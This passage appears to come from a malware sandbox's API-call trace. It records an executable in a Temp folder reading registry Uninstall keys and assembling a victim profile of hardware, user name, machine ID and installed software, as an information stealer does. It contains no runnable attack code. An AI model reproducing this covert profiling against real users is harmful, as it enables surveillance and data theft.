16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 " [0175.934] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001" [0175.935] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\n" [0175.935] RegCloseKey (hKey=0x354) returned 0x0 [0175.935] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x29, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-006E-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.935] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-006E-0409-0000-0000000FF1CE}") returned 90 [0175.935] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-006E-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.935] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office Shared MUI (English) 2016", lpcbData=0x197fd4*=0x2b) returned 0x0 [0175.935] lstrlenA (lpString="Microsoft Office Shared MUI (English) 2016") returned 42 [0175.935] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Office Shared MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016" [0175.935] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.935] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016", 